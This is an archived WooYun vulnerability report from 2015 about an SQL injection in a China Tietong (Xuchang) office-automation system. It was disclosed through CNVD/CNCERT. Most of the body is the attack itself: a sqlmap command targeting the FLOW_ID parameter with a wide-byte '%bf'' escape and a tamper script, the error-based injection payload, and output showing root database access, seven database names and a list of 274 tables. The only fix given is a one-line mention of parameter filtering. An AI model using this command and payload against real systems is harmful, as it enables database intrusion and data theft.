当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149843

漏洞标题:运营商安全许昌铁通系统SQL注入/root权限/274个表信息

相关厂商:中国铁通

漏洞作者: 路人甲

提交时间:2015-10-27 15:54

修复时间:2015-12-14 17:44

公开时间:2015-12-14 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

详细说明:

sqlmap -u "**.**.**.**/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20" --dbms=mysql --tamper=between


1.jpg


2.jpg


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: FLOW_ID=11%bf' AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
current database: 'td_oa'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: FLOW_ID=11%bf' AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
current user: 'root@**.**.**.**'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: FLOW_ID=11%bf' AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
available databases [7]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] TD_OA
[*] TD_OA_a
[*] TRAIN
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FLOW_ID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: FLOW_ID=11%bf' AND (SELECT 6628 FROM(SELECT COUNT(*),CONCAT(0x7178687771,(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END)),0x7174736771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Ljkw
---
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
Database: TD_OA
[274 tables]
+----------------------------------+
| session |
| user |
| version |
| address |
| address_group |
| affair |
| app_log |
| attachment_edit |
| attend_config |
| attend_duty |
| attend_evection |
| attend_holiday |
| attend_leave |
| attend_manager |
| attend_out |
| attendance_overtime |
| bbs_board |
| bbs_comment |
| book_info |
| book_manage |
| book_manager |
| book_type |
| bs_line |
| calendar |
| categories_type |
| censor_data |
| censor_module |
| censor_words |
| chatroom |
| contact |
| contract |
| contract_line |
| countdown |
| cp_asset_keep |
| cp_asset_reflect |
| cp_asset_type |
| cp_assetcfg |
| cp_cptl_info |
| cp_dpct_sub |
| cp_prcs_prop |
| crm_account |
| crm_account_care |
| crm_account_contact |
| crm_action |
| crm_complain |
| crm_contract |
| crm_customer_service |
| crm_depository |
| crm_marketing |
| crm_opportunity |
| crm_opportunity_products_list |
| crm_order |
| crm_order_products_list |
| crm_procurement_payment |
| crm_product |
| crm_product_type |
| crm_purchase_order |
| crm_purchase_order_products_list |
| crm_quotation |
| crm_quotation_products_list |
| crm_salepay |
| crm_solutions |
| crm_stockout |
| crm_stockout_products_list |
| crm_storage |
| crm_storage_products_list |
| crm_supplier |
| crm_supplier_contact |
| crm_sys_code |
| crm_sys_code_type |
| crm_sys_op_priv |
| crm_sys_uv |
| crm_sys_uv_field |
| customer |
| data_src |
| department |
| dept_map |
| diary |
| diary_comment |
| diary_comment_reply |
| doc_keywords |
| doc_print_log |
| doc_recv_data |
| doc_recv_prcs |
| doc_recv_priv |
| doc_send_data |
| doc_send_prcs |
| doc_type |
| efax_account |
| efax_receive_box |
| efax_send_box |
| email |
| email_body |
| email_box |
| email_name |
| exam_data |
| exam_flow |
| exam_paper |
| exam_quiz |
| exam_quiz_set |
| ext_user |
| field_date |
| fieldsetting |
| file_content |
| file_sort |
| flow_data_28 |
| flow_form_type |
| flow_hook |
| flow_print_tpl |
| flow_process |
| flow_query_tpl |
| flow_report |
| flow_report_priv |
| flow_rule |
| flow_run |
| flow_run_data |
| flow_run_feedback |
| flow_run_hook |
| flow_run_log |
| flow_run_prcs |
| flow_sort |
| flow_timer |
| flow_type |
| form_sort |
| gwiki_cate |
| gwiki_fav |
| gwiki_log |
| gwiki_priv |
| gwiki_tag |
| gwiki_template |
| gwiki_term |
| gwiki_term_final |
| gwiki_term_temp |
| hr_care_task |
| hr_code |
| hr_insurance_default |
| hr_insurance_manage |
| hr_insurance_para |
| hr_manager |
| hr_recruit_filter |
| hr_recruit_plan |
| hr_recruit_pool |
| hr_recruit_recruitment |
| hr_recruit_requirements |
| hr_sal_data |
| hr_staff_care |
| hr_staff_contract |
| hr_staff_incentive |
| hr_staff_info |
| hr_staff_labor_skills |
| hr_staff_learn_experience |
| hr_staff_leave |
| hr_staff_license |
| hr_staff_reinstatement |
| hr_staff_relatives |
| hr_staff_title_evaluation |
| hr_staff_transfer |
| hr_staff_work_experience |
| hr_training_examine |
| hr_training_plan |
| hr_training_record |
| hr_wage_manage |
| hr_welfare_manage |
| hrms |
| icqcontact_tb |
| icqmsgs_tb |
| icqservermsg_tb |
| im_group |
| im_message_cache |
| im_offline_file |
| interface |
| ip_rule |
| linkman |
| meeting |
| meeting_comment |
| meeting_equipment |
| meeting_room |
| module_priv |
| mytable |
| netchat |
| netdisk |
| netmeeting |
| news |
| news_comment |
| notes |
| notify |
| oa_cyclesource_used |
| oa_source |
| oa_source_used |
| oc_log |
| office_depository |
| office_products |
| office_task |
| office_transhistory |
| office_type |
| order_line |
| picture |
| plan_type |
| portal |
| product |
| proj_bug |
| proj_comment |
| proj_cost |
| proj_file |
| proj_file_log |
| proj_file_sort |
| proj_forum |
| proj_priv |
| proj_project |
| proj_task |
| proj_task_log |
| provider |
| provider_linkman |
| rms_file |
| rms_lend |
| rms_roll |
| rms_roll_room |
| rsa_keypair |
| sal_data |
| sal_flow |
| sal_item |
| sale_history |
| sale_manager |
| score_date |
| score_flow |
| score_group |
| score_item |
| seal |
| seal_keylic |
| seal_log |
| secure_key |
| service |
| sms |
| sms2 |
| sms2_priv |
| sms3 |
| sms_body |
| supply_history |
| supply_order |
| sys_code |
| sys_function |
| sys_log |
| sys_menu |
| sys_para |
| task |
| unit |
| url |
| user_group |
| user_map |
| user_online |
| user_priv |
| vehicle |
| vehicle_maintenance |
| vehicle_oil_use |
| vehicle_operator |
| vehicle_usage |
| vi_flow_run |
| vi_user |
| vote_data |
| vote_item |
| vote_title |
| webmail |
| webmail_body |
| wiki_ask |
| wiki_ask_answer |
| wiki_comment |
| wiki_info |
| winexe |
| word_model |
| work_detail |
| work_person |
| work_plan |
| zbap_paiban |
| zl_file |
+----------------------------------+

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 17:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无